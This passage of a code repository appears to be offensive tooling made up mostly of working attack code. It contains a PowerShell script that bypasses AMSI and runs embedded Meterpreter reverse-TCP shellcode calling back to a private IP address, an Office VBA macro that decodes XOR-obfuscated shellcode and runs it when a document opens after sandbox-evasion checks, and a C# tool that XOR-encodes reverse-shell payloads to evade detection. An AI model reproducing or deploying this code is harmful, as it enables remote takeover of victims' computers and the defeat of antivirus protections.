15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("1659e645-27b0-4ab9-a10e-64ba4b801cb0")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Simple Shellcode Runner/Simple Shellcode Runner.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}
8 | Exe
9 | Simple_Shellcode_Runner
10 | Simple Shellcode Runner
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 | true
26 |
27 |
28 | AnyCPU
29 | pdbonly
30 | true
31 | bin\Release\
32 | TRACE
33 | prompt
34 | 4
35 | true
36 |
37 |
38 | true
39 | bin\x64\Debug\
40 | DEBUG;TRACE
41 | true
42 | full
43 | x64
44 | 7.3
45 | prompt
46 | true
47 |
48 |
49 | bin\x64\Release\
50 | TRACE
51 | true
52 | true
53 | pdbonly
54 | x64
55 | 7.3
56 | prompt
57 | true
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
--------------------------------------------------------------------------------
/Simple Shellcode Runner/Simple Shellcode Runner.ps1:
--------------------------------------------------------------------------------
1 | # Compact AMSI bypass
2 | [Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)
3 |
4 | # Shellcode loader >:]
5 | function LookupFunc {
6 | Param ($moduleName, $functionName)
7 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
8 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
9 | Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
10 | $tmp=@()
11 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
12 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
13 | @($moduleName)), $functionName))
14 | }
15 |
16 | function getDelegateType {
17 | Param (
18 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
19 | [Parameter(Position = 1)] [Type] $delType = [Void]
20 | )
21 | $type = [AppDomain]::CurrentDomain.
22 | DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
23 | [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
24 | DefineDynamicModule('InMemoryModule', $false).
25 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
26 | [System.MulticastDelegate])
27 | $type.
28 | DefineConstructor('RTSpecialName, HideBySig, Public',
29 | [System.Reflection.CallingConventions]::Standard, $func).
30 | SetImplementationFlags('Runtime, Managed')
31 | $type.
32 | DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
33 | SetImplementationFlags('Runtime, Managed')
34 | return $type.CreateType()
35 | }
36 |
37 | # Allocate executable memory
38 | $lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),
39 | (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)
40 |
41 | # Copy shellcode to allocated memory
42 | # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.67 LPORT=443 EXITFUNC=thread -f powershell
43 | [Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x48,0x31,0xd2,0x56,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x4d,0x31,0xc9,0x48,0xf,0xb7,0x4a,0x4a,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x48,0x8b,0x52,0x20,0x41,0x51,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0x50,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0x41,0xc1,0xc9,0xd,0xac,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x41,0x58,0x5e,0x48,0x1,0xd0,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x1,0xbb,0xc0,0xa8,0x31,0x43,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x0,0x0,0x0,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x4,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x0,0x10,0x0,0x0,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x0,0x40,0x0,0x0,0x41,0x58,0x6a,0x0,0x5a,0x41,0xba,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x1,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x0,0x59,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0x89,0xda,0xff,0xd5
44 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
45 |
46 | # Execute shellcode and wait for it to exit
47 | $hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),
48 | (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
49 | [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject),
50 | (getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF)
--------------------------------------------------------------------------------
/Simple Shellcode Runner/Simple Shellcode Runner.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Simple Shellcode Runner", "Simple Shellcode Runner.csproj", "{1659E645-27B0-4AB9-A10E-64BA4B801CB0}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Release|Any CPU.ActiveCfg = Release|x64
17 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Release|Any CPU.Build.0 = Release|x64
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {AD661BF8-44C4-4DF0-8EF0-6B38C519DD39}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Simple Shellcode Runner/Simple Shellcode Runner.vba:
--------------------------------------------------------------------------------
1 | Private Declare PtrSafe Function Sleep Lib "kernel32" (ByVal mili As Long) As Long
2 | Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadId As Long) As LongPtr
3 | Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
4 | Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal destAddr As LongPtr, ByRef sourceAddr As Any, ByVal length As Long) As LongPtr
5 | Private Declare PtrSafe Function FlsAlloc Lib "KERNEL32" (ByVal callback As LongPtr) As LongPtr
6 | Sub LegitMacro()
7 | Dim allocRes As LongPtr
8 | Dim t1 As Date
9 | Dim t2 As Date
10 | Dim time As Long
11 | Dim buf As Variant
12 | Dim addr As LongPtr
13 | Dim counter As Long
14 | Dim data As Long
15 | Dim res As LongPtr
16 |
17 | ' Call FlsAlloc and verify if the result exists
18 | allocRes = FlsAlloc(0)
19 | If IsNull(allocRes) Then
20 | End
21 | End If
22 |
23 | ' Sleep for 10 seconds and verify time passed
24 | t1 = Now()
25 | Sleep (10000)
26 | t2 = Now()
27 | time = DateDiff("s", t1, t2)
28 | If time < 10 Then
29 | Exit Sub
30 | End If
31 |
32 | ' Shellcode encoded with XOR with key 0xfa/250 (output from C# helper tool)
33 | buf = Array(6, 178, 121, 30, 10, 18, 54, 250, 250, 250, 187, 171, 187, 170, 168, 178, 203, 40, 159, 178, 113, 168, 154, 171, 178, 113, 168, 226, 178, 113, 168, 218, 172, 178, 245, 77, 176, 176, 178, 113, 136, 170, 183, 203, 51, 178, 203, 58, 86, 198, 155, _
34 | 134, 248, 214, 218, 187, 59, 51, 247, 187, 251, 59, 24, 23, 168, 178, 113, 168, 218, 187, 171, 113, 184, 198, 178, 251, 42, 156, 123, 130, 226, 241, 248, 245, 127, 136, 250, 250, 250, 113, 122, 114, 250, 250, 250, 178, 127, 58, 142, 157, 178, _
35 | 251, 42, 190, 113, 186, 218, 179, 251, 42, 170, 113, 178, 226, 25, 172, 183, 203, 51, 178, 5, 51, 187, 113, 206, 114, 178, 251, 44, 178, 203, 58, 187, 59, 51, 247, 86, 187, 251, 59, 194, 26, 143, 11, 182, 249, 182, 222, 242, 191, 195, _
36 | 43, 143, 34, 162, 190, 113, 186, 222, 179, 251, 42, 156, 187, 113, 246, 178, 190, 113, 186, 230, 179, 251, 42, 187, 113, 254, 114, 178, 251, 42, 187, 162, 187, 162, 164, 163, 160, 187, 162, 187, 163, 187, 160, 178, 121, 22, 218, 187, 168, 5, _
37 | 26, 162, 187, 163, 160, 178, 113, 232, 19, 177, 5, 5, 5, 167, 179, 68, 141, 137, 200, 165, 201, 200, 250, 250, 187, 172, 179, 115, 28, 178, 123, 22, 90, 251, 250, 250, 179, 115, 31, 179, 70, 248, 250, 251, 65, 58, 82, 203, 185, 187, _
38 | 174, 179, 115, 30, 182, 115, 11, 187, 64, 182, 141, 220, 253, 5, 47, 182, 115, 16, 146, 251, 251, 250, 250, 163, 187, 64, 211, 122, 145, 250, 5, 47, 144, 240, 187, 164, 170, 170, 183, 203, 51, 183, 203, 58, 178, 5, 58, 178, 115, 56, _
39 | 178, 5, 58, 178, 115, 59, 187, 64, 16, 245, 37, 26, 5, 47, 178, 115, 61, 144, 234, 187, 162, 182, 115, 24, 178, 115, 3, 187, 64, 99, 95, 142, 155, 5, 47, 127, 58, 142, 240, 179, 5, 52, 143, 31, 18, 105, 250, 250, 250, 178, _
40 | 121, 22, 234, 178, 115, 24, 183, 203, 51, 144, 254, 187, 162, 178, 115, 3, 187, 64, 248, 35, 50, 165, 5, 47, 121, 2, 250, 132, 175, 178, 121, 62, 218, 164, 115, 12, 144, 186, 187, 163, 146, 250, 234, 250, 250, 187, 162, 178, 115, 8, _
41 | 178, 203, 51, 187, 64, 162, 94, 169, 31, 5, 47, 178, 115, 57, 179, 115, 61, 183, 203, 51, 179, 115, 10, 178, 115, 32, 178, 115, 3, 187, 64, 248, 35, 50, 165, 5, 47, 121, 2, 250, 135, 210, 162, 187, 173, 163, 146, 250, 186, 250, _
42 | 250, 187, 162, 144, 250, 160, 187, 64, 241, 213, 245, 202, 5, 47, 173, 163, 187, 64, 143, 148, 183, 155, 5, 47, 179, 5, 52, 19, 198, 5, 5, 5, 178, 251, 57, 178, 211, 60, 178, 127, 12, 143, 78, 187, 5, 29, 162, 144, 250, 163, _
43 | 65, 26, 231, 208, 240, 187, 115, 32, 5, 47)
44 |
45 | ' Allocate memory space
46 | addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
47 |
48 | ' Decode the shellcode
49 | For i = 0 To UBound(buf)
50 | buf(i) = buf(i) Xor 250
51 | Next i
52 |
53 | ' Move the shellcode
54 | For counter = LBound(buf) To UBound(buf)
55 | data = buf(counter)
56 | res = RtlMoveMemory(addr + counter, data, 1)
57 | Next counter
58 |
59 | ' Execute the shellcode
60 | res = CreateThread(0, 0, addr, 0, 0, 0)
61 | End Sub
62 | Sub Document_Open()
63 | MyMacro
64 | End Sub
65 | Sub AutoOpen()
66 | MyMacro
67 | End Sub
68 |
--------------------------------------------------------------------------------
/XOR Shellcode Encoder/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/XOR Shellcode Encoder/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 |
7 | namespace XorCoder
8 | {
9 | public class Program
10 | {
11 | public static void Main(string[] args)
12 | {
13 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp
14 | byte[] buf = new byte[511] {
15 | 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
16 | 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
17 | 0x8b,0x52,0x20,0x4d,0x31,0xc9,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,
18 | 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
19 | 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
20 | 0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
21 | 0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x8b,0x48,
22 | 0x18,0x50,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x4d,0x31,0xc9,0x48,
23 | 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,
24 | 0x0d,0xac,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
25 | 0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,
26 | 0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x41,0x58,
27 | 0x41,0x58,0x5e,0x59,0x48,0x01,0xd0,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,
28 | 0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
29 | 0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,
30 | 0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,
31 | 0x49,0xbc,0x02,0x00,0x01,0xbb,0xc0,0xa8,0xe8,0x85,0x41,0x54,0x49,0x89,0xe4,
32 | 0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,
33 | 0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,
34 | 0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,
35 | 0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,
36 | 0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,
37 | 0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,
38 | 0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,
39 | 0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,
40 | 0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,
41 | 0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,
42 | 0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,
43 | 0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,
44 | 0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,
45 | 0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,
46 | 0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,
47 | 0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,
48 | 0xff,0xe7,0x58,0x6a,0x00,0x59,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0x89,0xda,0xff,
49 | 0xd5 };
50 |
51 | // Encode the payload with XOR (fixed key)
52 | byte[] encoded = new byte[buf.Length];
53 | for (int i = 0; i < buf.Length; i++)
54 | {
55 | encoded[i] = (byte)((uint)buf[i] ^ 0xfa);
56 | }
57 |
58 | StringBuilder hex = new StringBuilder(encoded.Length * 2);
59 | int totalCount = encoded.Length;
60 | for (int count = 0; count < totalCount; count++)
61 | {
62 | byte b = encoded[count];
63 |
64 | if ((count + 1) == totalCount) // Dont append comma for last item
65 | {
66 | hex.AppendFormat("0x{0:x2}", b);
67 | }
68 | else
69 | {
70 | hex.AppendFormat("0x{0:x2}, ", b);
71 | }
72 |
73 | if ((count + 1) % 15 == 0)
74 | {
75 | hex.Append("\n");
76 | }
77 | }
78 |
79 | Console.WriteLine($"XOR payload (key: 0xfa):");
80 | Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{\n{hex}\n}};");
81 |
82 | //// Decode the XOR payload
83 | //for (int i = 0; i < buf.Length; i++)
84 | //{
85 | // buf[i] = (byte)((uint)buf[i] ^ 0xfa);
86 | //}
87 |
88 | }
89 | }
90 | }
--------------------------------------------------------------------------------
/XOR Shellcode Encoder/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("XOR Shellcode Encoder")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("XOR Shellcode Encoder")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("ee64b207-d973-489b-84a8-b718b93e039b")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/XOR Shellcode Encoder/XOR Shellcode Encoder.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {EE64B207-D973-489B-84A8-B718B93E039B}
8 | Exe
9 | XOR_Shellcode_Encoder
10 | XOR Shellcode Encoder
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/XOR Shellcode Encoder/XOR Shellcode Encoder.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "XOR Shellcode Encoder", "XOR Shellcode Encoder.csproj", "{EE64B207-D973-489B-84A8-B718B93E039B}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {EE64B207-D973-489B-84A8-B718B93E039B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {EE64B207-D973-489B-84A8-B718B93E039B}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {EE64B207-D973-489B-84A8-B718B93E039B}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {EE64B207-D973-489B-84A8-B718B93E039B}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {AB26D59A-5BB7-41F5-969C-46504DCF0D8F}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------